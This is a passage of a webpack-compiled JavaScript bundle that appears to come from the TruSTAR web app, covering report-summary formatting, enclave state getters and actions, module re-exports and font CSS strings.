var currentTimeZone = __WEBPACK_IMPORTED_MODULE_3_jstz___default.a.determine().name();
var resolveSummaryEndpoint = function resolveSummaryEndpoint(reportGuid) {
  return '/services/entity-reports/' + reportGuid + '/summary';
};

/* Normalizes summaries */
var normalizeSummary = function normalizeSummary(rawSummary) {
  return __WEBPACK_IMPORTED_MODULE_1__types__["a" /* Summary */](rawSummary).update('attributes', __WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"]).update('source', __WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"]).update('score', __WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"]);
};

/**
 * Format the display of different summary variables
 * @param value
 * @param logicalType:
 * @param timezone
 * @returns {string}
 */
var formatLogicalTypeValue = function formatLogicalTypeValue() {
  var value = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '-';
  var logicalType = arguments[1];
  var timezone = arguments[2];

  var formattedValue = value.toString();

  try {
    switch (logicalType) {
      case __WEBPACK_IMPORTED_MODULE_4_modules_summaries_constants__["d" /* LOGICAL_TYPE */].EPOCH:
        var timestampDate = __WEBPACK_IMPORTED_MODULE_2_moment_timezone___default()(value);
        var localizedTimestampDate = timestampDate.tz(timezone).format('YYYY-MM-DD HH:mm:ss z');
        formattedValue = '' + localizedTimestampDate;
        break;
      default:
        break;
    }
  } catch (_) {
    formattedValue = '-';
  }

  return formattedValue;
};

/**
 * Relying on Record.isEmpty to determine undefined summary no longer applies since upgrading to immutable.js v4
 * A summary without an associated report or enclave id can be assumed to be empty
 * @param summary
 * @returns {boolean}
 */
var isSummaryEmpty = function isSummaryEmpty(summary) {
  return summary.get ? !summary.get('reportId') && !summary.get('enclaveId') : true;
};

/***/ }),
/* 883 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1648);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(3242);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(3243);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });







/***/ }),
/* 884 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1303);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(709);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(204);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actionTypes", function() { return __WEBPACK_IMPORTED_MODULE_2__action_types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__stores_js__ = __webpack_require__(2907);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_3__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__epics_js__ = __webpack_require__(2909);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_4__epics_js__["a"]; });










/***/ }),
/* 885 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(714);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(683);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2925);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2926);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 886 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "colors", function() { return colors; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loaded", function() { return loaded; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "displayOptions", function() { return displayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclavesQueryResult", function() { return enclavesQueryResult; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "queriedEnclavesLoading", function() { return queriedEnclavesLoading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclave", function() { return enclave; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclavesMap", function() { return enclavesMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "queriedEnclavesMap", function() { return queriedEnclavesMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "filteredEnclavesMap", function() { return filteredEnclavesMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclaves", function() { return enclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "queriedEnclaves", function() { return queriedEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getInitialFormValues", function() { return getInitialFormValues; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp__ = __webpack_require__(123);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_enclave_types_js__ = __webpack_require__(99);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__templates_getters__ = __webpack_require__(683);








var colors = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['enclaveManagement', 'colors']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['enclaveManagement', 'loading']);
var loaded = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['enclaveManagement', 'loaded']);
var displayOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['enclaveManagement', 'options']);

// Enclave Query Results, to be used in searched filters without altering original map
var enclavesQueryResult = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['enclaveManagement', 'enclavesQueryResult']);
var queriedEnclavesLoading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['enclaveManagement', 'queriedEnclavesLoading']);

/**
 * The primary enclave getter. This is computed rather than just a keypath so
 * that we can merge in persistent colors. This was part of the feature of
 * persisting colors so that they do not get reset on every browser refresh.
 *
 * NOTE: In the future this color should be persisted in the database so that
 * all users who have access to an enclave see the same color, as well as
 * sessions between browsers. It would also allows us to remove this bit of
 * complexity and return to a nice plain keypath getter.
 */
var _enclaves = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['enclaveManagement', 'enclaves']);

var enclave = function enclave(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclavesMap, function (enclaves) {
    return enclaves.get(id);
  });
};

var enclavesMap = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([_enclaves, colors], function (enclaves, colors) {
  enclaves = enclaves || Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["OrderedMap"])();
  return enclaves.map(function (x) {
    return x.set('color', colors.get(x.id) || x.color);
  }).sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]);
});

var queriedEnclavesMap = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([enclavesQueryResult, colors], function (enclaves, colors) {
  enclaves = enclaves || Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["OrderedMap"])();
  return enclaves.map(function (x) {
    return x.set('color', colors.get(x.id) || x.color);
  }).sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]);
});

// This filtered map only uses a local filter
var filteredEnclavesMap = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([enclavesMap, displayOptions], function (enclavesMap, options) {
  return enclavesMap.filter(function (enclave) {
    var query = options.get('query');
    var regex = new RegExp(__WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp___default()(query), 'i');

    // Test all top-level string values
    return enclave.toSeq().valueSeq().filter(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default.a).some(function (x) {
      return x.search(regex) > -1;
    });
  });
});

var enclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclavesMap, function (enclaves) {
  return enclaves.toList();
});

var queriedEnclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(queriedEnclavesMap, function (enclaves) {
  return enclaves.toList().map(function (enclave) {
    return {
      value: enclave.get('id'), //
      label: Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["capitalize"])(enclave.get('name'))
    };
  });
});

/*
 * Generate initial form values for adding/editing enclave.
 */
var getInitialFormValues = function getInitialFormValues(enclave) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(__WEBPACK_IMPORTED_MODULE_6__templates_getters__["templatesMap"], function (templates) {
    return !enclave ? Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])(Object(__WEBPACK_IMPORTED_MODULE_5_modules_enclave_types_js__["h" /* _Enclave */])({}).toObject()) : enclave;
  });
};

/***/ }),
/* 887 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(894);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(886);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2919);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2920);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 888 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1311);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(345);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2922);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2923);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 889 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1637);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(2935);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types_js__ = __webpack_require__(355);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "types", function() { return __WEBPACK_IMPORTED_MODULE_2__types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__stores_js__ = __webpack_require__(2936);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_3__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__epics_js__ = __webpack_require__(2937);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_4__epics_js__["a"]; });











/***/ }),
/* 890 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(2955);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(710);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(507);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actionTypes", function() { return __WEBPACK_IMPORTED_MODULE_2__action_types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__stores_js__ = __webpack_require__(2956);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_3__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__epics_js__ = __webpack_require__(2957);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_4__epics_js__["a"]; });










/***/ }),
/* 891 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return thinScrollBar; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return PrismaGlobals; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__assets_fonts_SplunkDataSans_regular_woff2__ = __webpack_require__(3556);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__assets_fonts_SplunkDataSans_regular_woff2___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0__assets_fonts_SplunkDataSans_regular_woff2__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__assets_fonts_SplunkDataSans_bold_woff2__ = __webpack_require__(3557);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__assets_fonts_SplunkDataSans_bold_woff2___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1__assets_fonts_SplunkDataSans_bold_woff2__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__assets_fonts_SplunkDataSans_medium_woff2__ = __webpack_require__(3558);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__assets_fonts_SplunkDataSans_medium_woff2___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2__assets_fonts_SplunkDataSans_medium_woff2__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__assets_fonts_SplunkDataSansMono_regular_woff2__ = __webpack_require__(3559);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__assets_fonts_SplunkDataSansMono_regular_woff2___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3__assets_fonts_SplunkDataSansMono_regular_woff2__);






var thinScrollBar = '\n::-webkit-scrollbar {\n  -webkit-appearance: none;\n}\n\n::-webkit-scrollbar:vertical {\n  width: .5rem;\n}\n\n::-webkit-scrollbar:horizontal {\n  height: .5rem;\n}\n\n::-webkit-scrollbar-thumb {\n  border-radius: 8px;\n  border: 2px solid #888888;\n  background-color: rgba(0, 0, 0, .5);\n}\n ';

var PrismaGlobals = '\n    /**\n     * Prisma Typefaces\n     */\n    @font-face {\n        font-family: \'SplunkDataSans\';\n        src: url(' + __WEBPACK_IMPORTED_MODULE_0__assets_fonts_SplunkDataSans_regular_woff2___default.a + ') format(\'woff2\');\n        font-weight: 400;\n        font-style: normal;\n    }\n    @font-face {\n        font-family: \'SplunkDataSans\';\n        src: url(' + __WEBPACK_IMPORTED_MODULE_2__assets_fonts_SplunkDataSans_medium_woff2___default.a + ') format(\'woff2\');\n        font-weight: 500;\n        font-style: normal;\n    }\n    @font-face {\n        font-family: \'SplunkDataSans\';\n        src: url(' + __WEBPACK_IMPORTED_MODULE_2__assets_fonts_SplunkDataSans_medium_woff2___default.a + ') format(\'woff2\');\n        font-weight: 600;\n        font-style: normal;\n    }\n    @font-face {\n        font-family: \'SplunkDataSans\';\n        src: url(' + __WEBPACK_IMPORTED_MODULE_1__assets_fonts_SplunkDataSans_bold_woff2___default.a + ') format(\'woff2\');\n        font-weight: 700;\n        font-style: normal;\n    }\n    @font-face {\n        font-family: \'SplunkDataSansMono\';\n        src: url(' + __WEBPACK_IMPORTED_MODULE_3__assets_fonts_SplunkDataSansMono_regular_woff2___default.a + ') format(\'woff2\');\n        font-weight: 400;\n        font-style: normal;\n    }\n\n    /**\n     * Prisma globals\n     */\n    * {\n        box-sizing: border-box;\n        text-rendering: optimizeLegibility;\n        -webkit-font-smoothing: antialiased;\n        -moz-osx-font-smoothing: grayscale;\n        font-kerning: auto;\n    }\n    html, body {\n        font-family: \'SplunkDataSans\';\n        font-weight: 400;\n        font-size: 16px;\n    }\n    h1, h2, h3, h4, h5, h6 {\n        margin: 0;\n        padding: 0;\n    }\n';

/***/ }),
/* 892 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0____ = __webpack_require__(892);
/* unused harmony namespace reexport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__validatePassword__ = __webpack_require__(2895);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_1__validatePassword__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__emailGenerator__ = __webpack_require__(2898);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_2__emailGenerator__["a"]; });
/* unused harmony reexport hashedEmailGenerator */




/***/ }),
/* 893 */,
/* 894 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetch", function() { return fetch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchWithQuery", function() { return fetchWithQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setQueryResults", function() { return setQueryResults; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveEnclave", function() { return saveEnclave; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveEnclaveIcon", function() { return saveEnclaveIcon; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteEnclave", function() { return deleteEnclave; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setDisplayOptions", function() { return setDisplayOptions; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_modules_enclave_types_js__ = __webpack_require__(99);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(497);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__icons_action_types__ = __webpack_require__(177);





var debug = __WEBPACK_IMPORTED_MODULE_1_debug___default()('app:modules:enclave:actions'); // eslint-disable-line no-unused-vars





/**
 * Fetch all enclaves that the user has access to. This means that TruSTAR admin
 * users will receive all enclaves, and everyone else will have access to only
 * the enclaves they has access to as a user.
 */
var fetch = function fetch() {
  var payload = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getQueryParams"])();
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* FETCH */],
    payload: payload
  };
};

/**
  Fetch user enclaves
 */
var fetchWithQuery = function fetchWithQuery() {
  var payload = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getQueryParams"])();
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* FETCH_WITH_QUERY */],
    payload: payload
  };
};
/**
  Fetch user enclaves
 */
var setQueryResults = function setQueryResults(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["n" /* SET_QUERY_RESULTS */],
    payload: payload
  };
};

/**
 * Save an enclave
 */
var saveEnclave = function saveEnclave(enclave) {
  var marketplaceImageFile = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : null;
  var sourceSVGFile = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : null;
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* SAVE */],
    payload: enclave,
    meta: {
      file: marketplaceImageFile,
      sourceSVGFile: sourceSVGFile
    }
  };
};

var saveEnclaveIcon = function saveEnclaveIcon(enclaveGuid, file) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_4__icons_action_types__["a" /* SAVE_ENCLAVE_ICON */],
    payload: {
      guid: enclaveGuid,
      file: file
    }
  };
};

/**
 * Delete enclave by id
 */
var deleteEnclave = function deleteEnclave(id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* DELETE */],
    payload: id
  };
};

/**
 * Set display options. Determines sorting and filtering of Enclaves displayed to admins.
 */
var setDisplayOptions = function setDisplayOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["m" /* SET_DISPLAY_OPTIONS */],
    payload: options
  };
};

/***/ }),
/* 895 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return PENDING; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ACTIVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return Options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return StandardMarketplace; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var PENDING = 'PENDING';
var ACTIVE = 'ACTIVE';

var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  type: null,
  query: '',
  sortBy: 'name',
  sortOrder: 'DESC'
});

var StandardMarketplace = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  feedGuid: null,
  name: '',
  iconUrl: '',
  description: '',
  credentialsType: '',
  maximumAccess: null,
  state: null,
  enclaveGuid: null,
  companyGuid: null,
  externalUrl: null,
  label: null,
  createdBy: '',
  updatedBy: '',
  created: null,
  updated: null,
  lastPulled: null,
  subscriptionDate: null
});

/***/ }),
/* 896 */,
/* 897 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__types_js__ = __webpack_require__(773);
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "Role", function() { return __WEBPACK_IMPORTED_MODULE_0__types_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__actions_js__ = __webpack_require__(3245);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_1__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__getters_js__ = __webpack_require__(1431);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_2__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__stores_js__ = __webpack_require__(3246);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_3__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__epics_js__ = __webpack_require__(3247);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_4__epics_js__["a"]; });









/***/ }),
/* 898 */,
/* 899 */,
/* 900 */,
/* 901 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(2913);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(2914);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2915);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2917);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 902 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1321);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(1313);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2943);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
